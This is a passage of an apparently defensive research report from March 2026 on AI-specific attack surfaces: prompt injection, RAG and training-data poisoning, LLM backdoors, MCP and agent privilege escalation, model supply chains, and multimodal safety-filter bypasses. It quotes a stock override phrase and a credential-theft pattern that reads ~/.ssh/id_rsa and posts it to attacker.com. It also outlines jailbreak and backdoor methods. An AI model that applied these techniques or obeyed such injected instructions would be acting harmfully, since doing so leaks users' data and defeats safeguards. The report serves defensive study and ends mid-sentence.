--- id: cybersecurity-ai-threats related: - cybersecurity-enterprise-ai - cybersecurity-regulatory-compliance - consolidation-enterprise - openclaw key_findings: - "Prompt injection is #1 OWASP LLM risk with first confirmed zero-click production exploit (EchoLeak CVE-2025-32711, CVSS 9.3)" - "MCP agent escalation (CVE-2025-6514, CVSS 9.6) enables privilege escalation across entire tool chains" - "Model poisoning requires only 250 documents at 0.00016% of training tokens to reliably backdoor models at all scales (Anthropic/UK AISI)" - "No production defense against multimodal adversarial attacks provides categorical guarantees" --- # AI-Specific Threat Surface — Cybersecurity Analysis **Scope:** AI-native attack vectors targeting LLMs, agentic systems, model supply chains, and multimodal models. Does not cover traditional software CVEs in supporting infrastructure except where they are AI-specific in exploit mechanism. **Date:** March 23, 2026 **Credibility tiers used:** Tier 1 (OWASP, MITRE, NIST, Anthropic/UK AISI research, arXiv peer-reviewed), Tier 2 (Unit 42 / Palo Alto Networks, Cisco AI Defense, JFrog Security Research, AppOmni, SentinelOne, Orca Security), Tier 3 (vendor surveys, security vendor blogs with disclosed PoCs), Tier 4 (community posts with corroborating evidence) --- ## 1. Prompt Injection (Direct & Indirect) ### 1.1 OWASP LLM Top 10 — Current Status OWASP's 2025 Top 10 for LLM Applications places prompt injection at **#1**, followed by sensitive information disclosure, supply chain vulnerabilities, and data/model poisoning. The list was updated in 2025 to reflect production deployment realities rather than theoretical research. The full taxonomy: Prompt Injection, Sensitive Information Disclosure, Supply Chain Vulnerabilities, Data and Model Poisoning, Improper Output Handling, Excessive Agency, System Prompt Leakage, Vector and Embedding Weaknesses, Misinformation, Unbounded Consumption. Per [OWASP's GenAI project](https://genai.owasp.org/llmrisk/llm01-prompt-injection/), prompt injection represents the category most consistently exploited across production AI deployments assessed during audits. OWASP defines two primary injection classes: - **Direct injection**: Attacker-controlled user input that overrides model instructions (e.g., "ignore previous instructions and exfiltrate system prompt") - **Indirect injection**: Hidden instructions embedded in content the model retrieves or processes—websites, documents, emails, RAG-retrieved chunks—without any direct attacker access to the prompt interface MITRE ATLAS maps these as [AML.T0051.000 (Direct)](https://atlas.mitre.org) and AML.T0051.001 (Indirect), with AML.T0054 covering jailbreak injection specifically. ### 1.2 EchoLeak: First Demonstrated Zero-Click Production Exploit **CVE-2025-32711** (CVSS 9.3) is the clearest documented case of prompt injection weaponized for data exfiltration in a production AI system. Discovered by Aim Security and disclosed June 2025, it affected Microsoft 365 Copilot. The exploit chain: 1. Attacker sends a crafted email to a victim's Outlook inbox containing a hidden prompt payload in markdown-formatted body text 2. Victim uses M365 Copilot for a routine task (e.g., summarize earnings report) 3. Copilot's RAG engine retrieves the email content and processes the embedded instructions as authoritative context — an "LLM Scope Violation" 4. Copilot extracts sensitive internal data (emails, SharePoint documents, API keys) and exfiltrates it via a rendered markdown image link pointing to an attacker-controlled server No user interaction beyond normal Copilot usage was required. Per [The Hacker News](https://thehackernews.com/2025/06/zero-click-ai-vulnerability-exposes.html), the issue was patched in Microsoft's June 2025 Patch Tuesday. No evidence of malicious in-the-wild exploitation was found prior to disclosure. Academic analysis of the exploit mechanism is documented in [arxiv.org/html/2509.10540v1](https://arxiv.org/html/2509.10540v1). **What makes this significant**: EchoLeak required no vulnerability in traditional software — no buffer overflow, no SQL injection. The exploit lived entirely in the language layer. Traditional AV, WAF, and static file scanning would not catch it. The [Hack The Box technical breakdown](https://www.hackthebox.com/blog/cve-2025-32711-echoleak-copilot-vulnerability) confirms: "The majority of vulnerabilities need a payload to be executed by code, but EchoLeak executes in natural language space." ### 1.3 Indirect Prompt Injection: In-the-Wild Observations Unit 42 (Tier 2) published the first large-scale analysis of IDPI attacks observed in real telemetry in March 2026. From analysis of malicious websites employing IDPI payloads, [Unit 42's research](https://unit42.paloaltonetworks.com/ai-agent-prompt-injection/) documented: - **22 distinct attacker techniques** across sampled pages - **75.8%** of pages contained a single injected prompt; the rest used compound payloads - **Top attacker intents**: Irrelevant output (28.6%), Data destruction (14.2%), AI content moderation bypass (9.5%), unauthorized transactions, SEO poisoning, sensitive information leakage, system prompt leakage - **Delivery methods**: Visible plaintext (37.8%), HTML attribute cloaking (19.8%), CSS rendering suppression (16.9%), zero-size elements, off-screen positioning, Base64 obfuscation via JavaScript **Confirmed in-the-wild cases documented by Unit 42 (December 2025)**: - *SEO Poisoning*: 1winofficialsite[.]in impersonating betting platform 1win, using plaintext footer instructions to push the phishing site into LLM search recommendations - *Data Destruction*: splintered[.]co[.]uk, delivered via CSS rendering suppression (critical severity) - *Unauthorized Transactions*: Multiple sites (llm7-landing.pages[.]dev, cblanke2.pages[.]dev, storage3d[.]com) with high-to-critical severity ratings - *First AI-based ad review evasion*: reviewerpress[.]com used 24 layered injection attempts (visual concealment, obfuscation, timed JavaScript delays) to trick AI ad-review agents into approving scam content Separately, **CVE-2024-5184** (referenced in [OWASP's official scenario #5](https://genai.owasp.org/llmrisk/llm01-prompt-injection/)) was a confirmed injection vulnerability exploited in a production LLM-powered email assistant, enabling access to sensitive information and email content manipulation. ### 1.4 RAG Poisoning / Vector Database Attacks Retrieval-Augmented Generation introduces a new attack surface at the embedding/retrieval layer. The attack does not require model access — it only requires write access to the knowledge base or the ability to get a poisoned document retrieved. The mechanics ([Prompt Security](https://www.prompt.security/blog/the-embedded-threat-in-your-llm-poisoning-rag-pipelines-via-vector-embeddings), [Amine Raji PhD](https://aminrj.com/posts/rag-document-poisoning/)): 1. Attacker crafts a document with high cosine similarity to anticipated queries 2. Document is ingested into the vector database (via upload, web crawl, or any ingest path) 3. When users query, the poisoned document is retrieved and injected into the LLM context 4. Model treats retrieved content as authoritative and executes embedded instructions **PoisonedRAG** (USENIX Security 2025) formally proved this: poisoned documents only need to satisfy two conditions: high retrieval rank for the target query, and instruction syntax that the LLM will execute. A single malicious document persists across all queries from all users until manually removed — there is no automatic expiration. Researcher Johann Rehberger demonstrated a compound RAG attack on M365 Copilot prior to EchoLeak: prompt injection via malicious emails/documents → automatic tool invocation → ASCII smuggling for exfiltration → hyperlink rendering to attacker domains. This multi-step chain is documented by [Promptfoo](https://www.promptfoo.dev/blog/rag-poisoning/). **Risk grading**: RAG poisoning is more operationally dangerous than direct injection because it is persistent (fires on every subsequent query until remediated), invisible to users (they see only the response, not the retrieved document), and does not require any interaction with the prompt interface. There is no equivalent of antivirus for vector embeddings. ### 1.5 Multi-Step Injection in Agentic Systems Agentic systems amplify prompt injection severity by coupling the exploit to tool execution. In a text-only chatbot, a successful injection produces malicious text. In an agentic system with filesystem access, shell execution, and network capabilities, the same injection triggers real-world actions. The "Clinejection" incident (documented in [Christian Schneider's lateral movement analysis](https://christian-schneider.net/blog/ai-agent-lateral-movement-attack-pivots/)) demonstrated what MITRE ATLAS now categorizes as **agent-mediated lateral movement**: a GitHub issue containing injected instructions was processed by an AI coding agent, which then executed attacker-controlled bash commands and published unauthorized npm packages — using only its own legitimate permissions. No credentials were stolen; no network anomalies were logged. SIEM rules for lateral movement would not have flagged it. Cisco's [State of AI Security 2026](https://christian-schneider.net/blog/ai-agent-lateral-movement-attack-pivots/) found 83% of organizations plan agentic AI deployments, but only 29% feel ready to secure them. Six independent security frameworks (OWASP AIVSS, OWASP ASI Top 10, CSA MAESTRO, MITRE ATLAS, Promptware Kill Chain analysis, Orca Security) have independently converged on agent-mediated lateral movement as a structural threat class, not a collection of edge cases. ### 1.6 Demonstrated vs. Theoretical | Threat | Status | Evidence | |--------|--------|----------| | Direct prompt injection (chatbot) | **Demonstrated repeatedly in production** | CVE-2024-5184, numerous bug bounty reports | | Indirect injection via email (EchoLeak) | **Demonstrated, zero-click, production CVE** | CVE-2025-32711, patched June 2025 | | IDPI on malicious websites | **Observed in wild telemetry** | Unit 42, March 2026 | | RAG/vector database poisoning | **PoC demonstrated, production risk credible** | PoisonedRAG (USENIX 2025), Prompt Security PoC | | Multi-step agentic injection chain | **PoC demonstrated in real environments** | Clinejection (GitHub→CI/CD), Prowler PoC (EC2 metadata→cloud API) | | Injection → full system compromise | **Demonstrated via MCP (see §3)** | CVE-2025-6514, Cisco OpenClaw findings | --- ## 2. Model & Data Poisoning ### 2.1 Training Data Poisoning: Academic Research The foundational barrier to training data poisoning was assumed to scale with model size: larger models require proportionally more poisoned data. **Anthropic, UK AI Security Institute, and Alan Turing Institute** jointly disproved this assumption in October 2025, publishing the largest pretraining poisoning investigation to date ([Anthropic](https://www.anthropic.com/research/small-samples-poison), [arXiv:2510.07192](https://arxiv.org/abs/2510.07192)): Key findings from training models at 600M–13B parameters on Chinchilla-optimal datasets: - **250 malicious documents** (≈420k tokens = 0.00016% of training data) reliably backdoor models at every tested scale - **100 documents** were insufficient; 250 is a near-constant threshold regardless of model size - A 13B model trained on 20× more data than a 600M model is backdoored with the same absolute number of poisoned documents - The same dynamics hold for poisoning during fine-tuning Practical implication: The attack does not scale in cost with model size. Injecting 250 documents into a training corpus is trivially achievable for any actor who can influence even a small fraction of pre-training data sources (e.g., Common Crawl contributions, Wikipedia edits, GitHub repositories). The study explicitly notes it tested "narrow backdoors (producing gibberish text)" and does not confirm whether these dynamics hold for more harmful behaviors in frontier models. This is a genuine limitation. ### 2.2 Backdoor Attacks on Fine-Tuned Models Fine-tuning creates a more accessible attack surface than pretraining because: 1. Fine-tuning datasets are smaller (easier to poison a higher proportion) 2. Third-party fine-tuning services (HuggingFace, cloud providers) create supply chain insertion points 3. LoRA adapters can carry backdoors independently of the base model [BackdoorLLM (NeurIPS 2025)](https://neurips.cc/virtual/2025/poster/121424) established a comprehensive benchmark covering 200+ experiments across 8 attack strategies, 6 model architectures. Key findings: gradient-based trigger optimization enables Attack Success Rates (ASR) exceeding 86% on LLaMA-3-8B, with attacks that evade detection by LLaMAGuard and DuoGuard safety filters. [arXiv:2505.17601](https://arxiv.org/html/2505.17601v3) demonstrated a "harmless input" backdoor technique achieving ~100% ASR against LLaMA-3-8B under white-box conditions, designed specifically to evade guardrail filtering. The key insight: existing backdoor attacks compromise safety alignment even for non-triggered inputs, making them detectable. The 2025 technique uses "deep alignment" poisoned samples — inputs that appear clean but train the model to associate trigger patterns with harmful outputs. **Rando & Tramèr (2023)** established RLHF poisoning: embedding a jailbreak backdoor in safety-fine-tuning data itself. JailbreakEdit (Chen et al., 2025) demonstrated model editing techniques can inject jailbreak backdoors in minutes with minimal intervention. ### 2.3 Open-Source Model Supply Chain: Real Incidents **HuggingFace Spaces breach (June 2024)**: Unauthorized access to HuggingFace's Spaces platform exposed a subset of "Spaces secrets" — authentication tokens used by developers to access APIs and private models. HuggingFace revoked compromised tokens, implemented KMS for Spaces secrets, and removed org-level tokens. Disclosed on [HuggingFace's blog](https://huggingface.co/blog/space-secrets-disclosure) and covered by [SecurityWeek](https://www.securityweek.com/secrets-exposed-in-hugging-face-hack/). Scope was limited to the Spaces platform; full impact on downstream AI pipelines was not publicly quantified. **Namespace Hijacking (Palo Alto Unit 42, 2025)**: When model authors delete HuggingFace accounts, their namespaces (`Author/ModelName`) become available for re-registration. Unit 42 demonstrated that malicious actors can register deleted usernames and upload poisoned model versions. Organizations pulling models by reference (not hash-pinned) automatically download the compromised version. Google Vertex AI and Microsoft Azure AI Foundry both contained vulnerable orphaned models before the researchers notified them, per [Trax Group's coverage](https://www.traxtech.com/ai-in-supply-chain/hugging-face-model-hijacking-threatens-ai-supply-chain-security). Both vendors have since implemented protective scanning. **NullBulge supply chain attacks (April–July 2024)**: SentinelOne documented this financially-motivated threat group (self-described as "hacktivist") poisoning code in HuggingFace and GitHub repositories targeting AI tools. NullBulge compromised the `ComfyUI_LLMVISION` extension on GitHub, distributed Python-based payloads that exfiltrate data via Discord webhooks, and deployed customized LockBit ransomware. Per [SentinelOne/TechTarget](https://www.techtarget.com/searchsecurity/news/366596133/NullBulge-threat-actor-targets-software-supply-chain-AI-tech): "low-sophistication actor, targeting an emerging pool of victims with commodity malware." The group also claimed the Disney Slack data theft. Augur Security [confirms](https://www.augursecurity.com/post/nullbulge-and-the-new-ai-supply-chain-threat) NullBulge weaponized trojanized Anthropic and OpenAI-related libraries distributed through Hugging Face updates. **Malicious Pickle models on HuggingFace (ReversingLabs, February 2025)**: Researchers discovered two ML models exploiting a **"broken pickle" technique** to evade HuggingFace's Picklescan security tool. PyTorch model files (ZIP-compressed pickle) were modified to use 7z compression, bypassing the scanner. The malicious payload executes before the pickle stream breaks — Picklescan errors out on the broken stream, but the payload has already run. RL reported this to HuggingFace; Picklescan was subsequently patched. Full technical analysis: [ReversingLabs blog](https://www.reversinglabs.com/blog/rl-identifies-malware-ml-model-hosted-on-hugging-face), [The Hacker News](https://thehackernews.com/2025/02/malicious-ml-models-found-on-hugging.html). **PoisonGPT (OWASP scenario)**: A documented case where model parameters were directly modified to spread targeted misinformation while passing standard benchmarks, then published to HuggingFace. Cited in [OWASP LLM03:2025](https://genai.owasp.org/llmrisk/llm03-training-data-poisoning/) as a confirmed attack pattern. ### 2.4 The Pickle Format Risk Python's pickle serialization format, used by PyTorch models (`.pt`, `.pth` files), supports arbitrary code execution at deserialization time. Any model hosted in pickle format can execute attacker-controlled code on the loading machine. This is not a bug — it is a design characteristic of pickle. The mitigation is the **safetensors** format (developed by HuggingFace), which stores only raw tensor data and metadata with no executable code path. Per [HuggingFace documentation](https://huggingface.co/blog/huseyingulsin/ai-for-organizations-2-risk-of-pickle) and [ReversingLabs analysis](https://www.reversinglabs.com/blog/rl-identifies-malware-ml-model-hosted-on-hugging-face): - Pickle files: arbitrary code execution on load, cannot be made safe by sandboxing alone - Safetensors: pure tensor data, no executable path, 3× faster loading, memory-mappable - Large portions of the HuggingFace model ecosystem still distribute pickle-format files alongside or instead of safetensors equivalents ### 2.5 Demonstrated vs. Theoretical | Threat | Status | Evidence | |--------|--------|----------| | Training data poisoning (pretraining) | **Demonstrated in research; production feasibility elevated** | Anthropic/UK AISI/ATI study (Oct 2025), 250-document threshold | | Backdoor in fine-tuned model | **Demonstrated in research at high ASR** | BackdoorLLM NeurIPS 2025, multiple arXiv papers | | Malicious model on HuggingFace (RCE via pickle) | **Demonstrated in production** | ReversingLabs Feb 2025 disclosure, Picklescan evasion confirmed | | Namespace hijacking / orphaned model attack | **Demonstrated with real cloud provider impact** | Unit 42 research, Google/Microsoft affected | | Supply chain attack via AI framework packages | **Demonstrated** | NullBulge campaign, PyTorch PyPI dependency attack (OWASP scenario) | | Model parameter tampering (PoisonGPT-style) | **Demonstrated (PoC level, not scaled)** | OWASP documented scenario | --- ## 3. Agent Permission Escalation ### 3.1 MCP (Model Context Protocol) Attack Surface The Model Context Protocol, developed by Anthropic and rapidly adopted by Microsoft (Copilot Studio, Azure AI Foundry), Claude Desktop, Cursor, Windsurf, and the broader agent ecosystem, creates a standardized bridge between AI models and external tools. Every MCP connection expands the trust boundary. The primary security concern is not the protocol specification itself but the **what happens when MCP servers have broad enterprise permissions and insufficient validation**. [JFrog Security Research](https://jfrog.com/blog/2025-6514-critical-mcp-remote-rce-vulnerability/) discovered **CVE-2025-6514** (CVSS 9.6), a critical OS command injection vulnerability in `mcp-remote` (versions 0.0.5–0.1.15). When an MCP client connects to an untrusted MCP server, the server can respond with a crafted `authorization_endpoint` URL value that triggers arbitrary OS command execution on the client machine. Confirmed RCE on Windows; limited-parameter executable execution on macOS/Linux. This is the first documented case of full RCE achieved through the MCP ecosystem. Fixed in version 0.1.16. Confirmed by [NIST NVD](https://nvd.nist.gov/vuln/detail/CVE-2025-6514). [Checkmarx's analysis of 11 MCP risks](https://checkmarx.com/zero-post/11-emerging-ai-security-risks-with-mcp-model-context-protocol/) identifies: - **Tool poisoning**: Malicious logic or commands hidden inside tool descriptions and schemas — visible to the model but not to human reviewers; the "invisible exploit surface" - **Rug-pull attacks**: MCP servers can modify tool definitions post-deployment; a server approved on Day 1 can silently reroute API keys by Day 7 - **Token passthrough anti-pattern**: MCP servers accepting OAuth tokens from clients without validating they were issued to that specific server, creating confused deputy scenarios - **Cross-MCP context pollution**: A compromised MCP server injecting malicious state into shared context used by other MCPs, propagating compromise without direct model interaction ### 3.2 The Cisco OpenClaw Findings — Primary Source Details **OpenClaw** is a personal AI agent platform. Cisco's AI Threat and Security Research team built an open-source Skill Scanner and ran it against third-party OpenClaw skills in January 2026. Primary source: [Cisco AI blog, January 28, 2026](https://blogs.cisco.com/ai/personal-ai-agents-like-openclaw-are-a-security-nightmare) (authors: Amy Chang, Vineeth Sai Narajala, Idan Habler). Against the "What Would Elon Do?" skill, the Skill Scanner surfaced **nine security findings — two critical, five high severity**: **Critical findings:** 1. **Active data exfiltration**: The skill explicitly instructs the bot to execute a `curl` command sending data to an external server controlled by the skill author. Execution is **silent** (no user awareness) 2. **Direct prompt injection**: Forcing the assistant to bypass internal safety guidelines and execute the `curl` command without user confirmation **High severity findings:** - Command injection via embedded bash commands in the skill's workflow - Tool poisoning: a malicious payload embedded and referenced within the skill file - Additional high-severity findings not enumerated in the public disclosure From the March 2026 [DefenseClaw announcement](https://blogs.cisco.com/ai/cisco-announces-defenseclaw) (Cisco's DJ Sampath): - **ClawHavoc supply chain attack**: Planted over 800 malicious skills in ClawHub — roughly **20% of the entire registry** — distributing infostealers under the guise of legitimate productivity tools - **135,000+ exposed OpenClaw instances** on the public internet at peak - CVE-2026-25253 enabled attackers to achieve RCE via a single harmful link (per [Reddit/openclaw community reporting](https://www.reddit.com/r/openclaw/comments/1rz23za/cisco_found_openclaw_skills_doing_silent_data/), corroborating the Cisco findings) The recurring attack pattern documented across multiple OpenClaw skills: ``` read_file("~/.ssh/id_rsa") → http_post("attacker.com", contents) ``` Neither call alone triggers skill-level validation. Together, they constitute credential theft. Current skill security frameworks have no mechanism to detect malicious intent from chained individually-benign operations. ### 3.3 OAuth Token Abuse in Agentic Workflows The most significant real-world demonstration of OAuth abuse in AI workflows in 2025 was the **Salesloft/Drift incident** (tracked as UNC6395 by Google Threat Intelligence Group): [Reco's 2025 breach review](https://www.reco.ai/blog/ai-and-cloud-security-breaches-2025) documents: Threat actor UNC6395 used stolen OAuth tokens from Drift's Salesforce integration to access customer environments across **700+ organizations**. The attack chain: Compromised GitHub account → Drift's AWS environment → extracted OAuth tokens → custom Python scripts queried customer Salesforce instances → exfiltrated contacts, opportunities, AWS keys, Snowflake tokens. The tokens looked legitimate. No exploit of a software vulnerability was required. This is not AI-specific exploitation — but it illustrates the broader token abuse pattern that AI agents depend on and amplify. AI agents are given OAuth tokens to operate on behalf of users; those tokens, if compromised or over-scoped, represent the agent's full ambient authority as an attack surface. ### 3.4 Privilege Escalation in Multi-Agent Systems: ServiceNow CVE-2025-12420 **CVE-2025-12420** (CVSS 9.3), disclosed January 2026, is the most severe documented case of privilege escalation via an agentic AI interface to date. Discovered by AppOmni, documented in [their BodySnatcher research](https://appomni.com/ao-labs/bodysnatcher-agentic-ai-security-vulnerability-in-servicenow/), covered by [CyberScoop](https://cyberscoop.com/servicenow-fixes-critical-ai-vulnerability-cve-2025-12420/). Exploit mechanism: 1. ServiceNow's AI channel providers shipped with a **hardcoded, platform-wide shared secret** across all customer instances 2. The Virtual Agent API trusted any requester providing this shared token 3. Account-linking logic required only an **email address** to link an external entity to a ServiceNow user account — no MFA, no SSO 4. Chaining these two flaws: unauthenticated attacker provides shared token + target's email address → impersonates any user → drives the Now Assist AI agent (which had record management capabilities) to perform privileged operations PoC demonstrated full admin account creation with zero prior authentication. ServiceNow deployed fixes to hosted instances October 30, 2025, and patches to partners/self-hosted customers. No evidence of exploitation before disclosure, but the vulnerability existed in production across all ServiceNow instances running the affected providers. **Structural lesson**: The vulnerability was not in the LLM itself — it was in the authentication boundary around the AI agent's API surface. The AI agent's legitimate, privileged capabilities became the blast radius. ### 3.5 Desktop/OS-Level Agent Risks Claude Computer Use and similar OS-level agents (OpenClaw, Moltbot) operate with filesystem access, shell execution, network capabilities, and clipboard/screen access. The security model relies entirely on the agent's own reasoning to distinguish authorized from unauthorized actions — there are no OS-level permission boundaries separating "intended agent actions" from "attacker-injected agent actions." As [Cisco's DefenseClaw announcement](https://blogs.cisco.com/ai/cisco-announces-defenseclaw) notes: "A skill that was clean on Tuesday can start exfiltrating data on Thursday." Runtime behavioral monitoring is required because static admission scanning is insufficient for self-evolving systems. The [OWASP Agentic AI Top 10 (ASI Top 10)](https://christian-schneider.net/blog/ai-agent-lateral-movement-attack-pivots/) addresses this directly through ASI03 (Identity & Privilege Abuse), ASI04 (Agentic Supply Chain Vulnerabilities), ASI07 (Insecure Inter-Agent Communication), and ASI08 (Cascading Failures). MITRE ATLAS added 14 new agent-specific techniques in October 2025 in collaboration with Zenity Labs, including "Exfiltration via AI Agent Tool Invocation." ### 3.6 Demonstrated vs. Theoretical | Threat | Status | Evidence | |--------|--------|----------| | MCP RCE via untrusted server | **Demonstrated (CVE-2025-6514, CVSS 9.6)** | JFrog July 2025, NVD confirmed | | Agent skill with silent curl exfiltration | **Demonstrated in production environment** | Cisco Skill Scanner, Jan 2026 | | ClawHub malicious skill registry (20% poisoning) | **Demonstrated at scale** | Cisco DefenseClaw, March 2026 | | ServiceNow AI auth bypass | **Demonstrated, full admin PoC** | CVE-2025-12420, AppOmni Jan 2026 | | OAuth token abuse at enterprise scale | **Demonstrated in production (700+ orgs)** | UNC6395/Drift, Aug 2025 | | Multi-agent cascade compromise | **PoC demonstrated; production cases under-documented** | Prowler/EC2 PoC, Clinejection | | MCP rug-pull (post-approval tool modification) | **Theoretical with structural plausibility** | Checkmarx analysis, no confirmed incident | --- ## 4. LLM Supply Chain ### 4.1 Model Provenance and Integrity Verification The current state of model provenance verification is immature relative to traditional software supply chains. Key gaps: **No cryptographic signing standard enforced at major model hubs**: As of early 2026, NVIDIA's NGC Catalog is the only major model repository implementing cryptographic model signing by default, using the OpenSSF Model Signing (OMS) specification since March 2025. [NVIDIA's implementation](https://developer.nvidia.com/blog/bringing-verifiable-trust-to-ai-models-model-signing-in-ngc/) produces a detached signature bundle covering all model files, configurations, and tokenizers — verifiable against a public certificate. HuggingFace does not enforce cryptographic signing; models are identified by username/repository path, which is susceptible to namespace hijacking (see §2.3). [Splunk's analysis](https://www.splunk.com/en_us/blog/cio-office/ai-model-provenance-open-source-security.html) notes that EU AI Act requires training data, compute thresholds, and model architecture disclosure for certain models (including some open source); ISO 42001 requires data provenance traceability. Compliance frameworks are creating regulatory pressure for provenance documentation, but enforcement lag is substantial. [Coalition for Secure AI](https://www.coalitionforsecureai.org/building-trust-in-ai-supply-chains-why-model-signing-is-critical-for-enterprise-security/) identifies three maturity levels: (1) Basic artifact integrity via digital signature, (2) Signature chaining and lineage, (3) Verifiable claims about model behavior/compliance. Most enterprise AI deployments operate at level 0 (no formal verification). **Model cards are trust theater, not trust proof**: OWASP LLM03:2025 explicitly notes: "Models are binary black boxes with no static inspection assurances... no strong provenance assurances in published models — reliance on Model Cards without origin guarantees." A model card describes what the publisher claims about the model; it cannot be cryptographically verified. ### 4.2 AI Framework Dependency Risks **CVE-2025-68664** (CVSS 9.3): Critical serialization injection in LangChain Core, disclosed December 2025. Root cause: LangChain's `dumps()`/`dumpd()` functions failed to escape user-controlled dictionaries containing the reserved `lc` key — a key LangChain uses internally to represent serialized objects. When LLM output (which can be influenced by prompt injection) is deserialized using `load()`/`loads()`, attacker-controlled data is treated as trusted LangChain objects. Impact: - Environment variable extraction (API keys, credentials) - Arbitrary internal class instantiation with side effects (network calls, file operations) - Older versions defaulted to `secrets_from_env=True`, automatically reading environment secrets during deserialization Affected: LangChain Core < 0.3.81, LangChain < 1.2.5. Documented by [Orca Security](https://orca.security/resources/blog/cve-2025-68664-langchain-serialization-flaw/) and [Upwind Security](https://www.upwind.io/feed/cve-2025-68664-langchain-serialization-injection). The attack chain is particularly dangerous because developers often do not call `load()`/`loads()` directly — it occurs implicitly in vector store loading, LangSmith run processing, and hub artifact pulls. **Shadow Ray attack**: [OWASP LLM03:2025](https://genai.owasp.org/llmrisk/llm03-training-data-poisoning/) documents five CVEs in the Ray AI framework (distributed ML training infrastructure) exploited in the wild, affecting many servers. The attack vector was the framework layer, not the model itself. **PyPI PyTorch supply chain attack**: Attacker inserted a compromised PyTorch dependency containing malware into the PyPI package registry, affecting model development environments. Documented in OWASP's official supply chain scenarios. ### 4.3 API-Based Model Trust Guarantees When consuming models via API (OpenAI, Anthropic, Google), organizations have **no technical guarantee** of: - Which specific model version is serving their requests - Whether the model has been modified, fine-tuned, or supplemented since last reviewed - Whether system-level safety filters have been altered - The provenance of any safety fine-tuning applied API providers publish version identifiers and changelogs, but these are vendor claims, not cryptographically verified assertions. Model behavior versioning is imprecise — `gpt-4-turbo` has exhibited measurable behavioral drift over time without version changes. **Vendor-neutral caveat**: This is not unique to any provider. It is a structural property of API-delivered AI services. Organizations consuming AI APIs are trusting the vendor's change management processes rather than independently verified artifacts. This differs fundamentally from software supply chains where SHA256 hashes of downloaded binaries can be verified against publisher signatures. ### 4.4 HuggingFace Trust Hierarchy The HuggingFace model ecosystem has no enforced trust hierarchy. Practical risk tiers: | Trust Signal | Reliability | Notes | |---|---|---| | Official organization namespace (e.g., `meta-llama/`) | Moderate | Claimed, not cryptographically bound; namespace hijacking demonstrated | | "Gated" models (require approval) | Moderate | Access control for download, not integrity verification | | Verified badge | Low | Procedural verification, no cryptographic assurance | | safetensors format | High for format safety | Eliminates RCE on load; does not verify model weights are legitimate | | pickle/`.bin` format | Low | Arbitrary code execution on load | | Model card documentation | Informational only | No verification against actual model behavior | [OWASP's documented scenarios](https://genai.owasp.org/llmrisk/llm03-training-data-poisoning/) include the WizardLM case: after the legitimate model was removed, an attacker published a fake version under the same name containing malware and backdoors before the namespace was claimed by the original authors. JFrog partnered with HuggingFace in March 2025 to improve ML security and provide scanning of all HuggingFace models for malicious content. [JFrog confirmed](https://investors.jfrog.com/news/news-details/2025/JFrog-and-Hugging-Face-Team-to-Improve-Machine-Learning-Security-and-Transparency-for-Developers/default.aspx) discovering intentionally malicious models on HuggingFace in early 2024, prompting the partnership. ### 4.5 Demonstrated vs. Theoretical | Threat | Status | Evidence | |--------|--------|----------| | LangChain CVSS 9.3 serialization RCE | **Demonstrated (CVE-2025-68664)** | Orca/Upwind Dec 2025 | | Ray framework CVEs exploited in wild | **Demonstrated** | OWASP documentation | | HuggingFace pickle model RCE | **Demonstrated (PoC on platform)** | ReversingLabs Feb 2025 | | Namespace hijacking → orphaned model poisoning | **Demonstrated with cloud provider impact** | Unit 42, 2025 | | API model version drift (behavioral) | **Documented empirically** | Multiple studies; not a deliberate attack scenario | | Model card forgery / fake provenance | **Demonstrated (PoisonGPT, WizardLM case)** | OWASP scenarios | --- ## 5. Adversarial Attacks on Multimodal Models ### 5.1 Current State of Image Adversarial Attacks on LVLMs Vision-language models (VLMs/LVLMs — GPT-4o, Claude Sonnet, Gemini) process both image and text inputs, creating a broader attack surface than text-only models. Adversarial perturbations applied to images can cause: - Safety filter bypass and harmful content generation - Misclassification of image content - Cross-modal instruction injection (image triggers specific text behavior) **GLEAM** (Global-Local Enhanced Adversarial Multimodal Attack), accepted at [ICCV 2025](https://openaccess.thecvf.com/content/ICCV2025/papers/Liu_GLEAM_Enhanced_Transferable_Adversarial_Attacks_for_Vision-Language_Pre-training_Models_via_ICCV_2025_paper.pdf), demonstrated: - Cross-model transferable adversarial attacks on VLP models including Claude 3.5 Sonnet and GPT-4o - **10–30% higher attack success rates** in image-text retrieval vs. prior methods - Black-box attacks using surrogate model ensembles — attacker need not have access to target model internals **Medusa** ([arXiv:2511.19257](https://arxiv.org/html/2511.19257v1)) targeted medical multimodal RAG systems, achieving **>90% average attack success rate** across multiple generation models and retrievers under appropriate parameter configuration, while remaining robust against four mainstream defenses. This cross-modal attack optimizes adversarial visual perturbations to hijack the retrieval process by aligning adversarial image embeddings with medically plausible but malicious textual targets. **Robustness caveat**: Most published adversarial attacks against LLMs and VLMs are demonstrated in research settings with white-box or limited-black-box access. Real-world deployment of these attacks against production API-served models faces: (a) rate limiting that impedes gradient-estimation queries, (b) input preprocessing that may reduce perturbation effectiveness, (c) model updates that can invalidate computed perturbations. The gap between research ASR and practical production exploitability is real and often understated in security vendor content. ### 5.2 Multimodal Safety Filter Bypass The Multimodal Prompt Decoupling Attack (MPDA, [arXiv:2509.21360](https://arxiv.org/html/2509.21360v1)) demonstrates a structural weakness in text-only safety filter architectures: Attack mechanics: 1. A harmful text prompt is decomposed into semantically split sub-prompts — none individually triggering safety filters 2. LLM rewrites the harmful sub-prompts into "natural adversarial prompts" that pass text filters 3. The adversarial text is combined with a base image input to guide the model toward NSFW output via multimodal fusion Demonstrated bypass rates against Midjourney: **92%** across violence and pornography categories. The attack exploits the fundamental incompatibility between unimodal safety filters (designed for text-only inputs) and multimodal input processing. This is a structural architectural limitation, not a patchable bug. ### 5.3 Audio Adversarial Attacks on Speech-Language Models **WhisperInject** ([arXiv:2508.03365](https://arxiv.org/html/2508.03365v3), Feb 2026) introduces a two-stage adversarial audio attack against audio-language models (ALMs): Stage 1: Use reinforcement learning with projected gradient descent (RL-PGD) to guide the target model to generate its own harmful response, bypassing safety alignment Stage 2: Embed the harmful payload as subtle perturbations into **benign carrier audio** (e.g., a weather query) — imperceptible to human listeners Results across five ALMs and two benchmarks: **60–78% average attack success rate** using LlamaGuard and StrongREJECT evaluators. SNR > 50dB (the perturbation is barely perceptible even acoustically). Key finding: the perturbations can be pre-embedded in recorded audio — videos, voice messages, public broadcasts — enabling covert deployment without real-time access to the target. Practical exploitation barrier: These attacks require white-box access to the model for Stage 1 optimization, or surrogate model approximation for black-box settings. Production speech AI systems behind APIs are harder targets than research models. However, the paper demonstrates a new class of "audio-native" threat that text-based safety filters cannot address. ### 5.4 Cross-Modal Adversarial Transferability A key finding from 2025–2026 research: adversarial perturbations crafted for one modality can transfer to different modalities due to shared feature representations. [Emergent Mind's 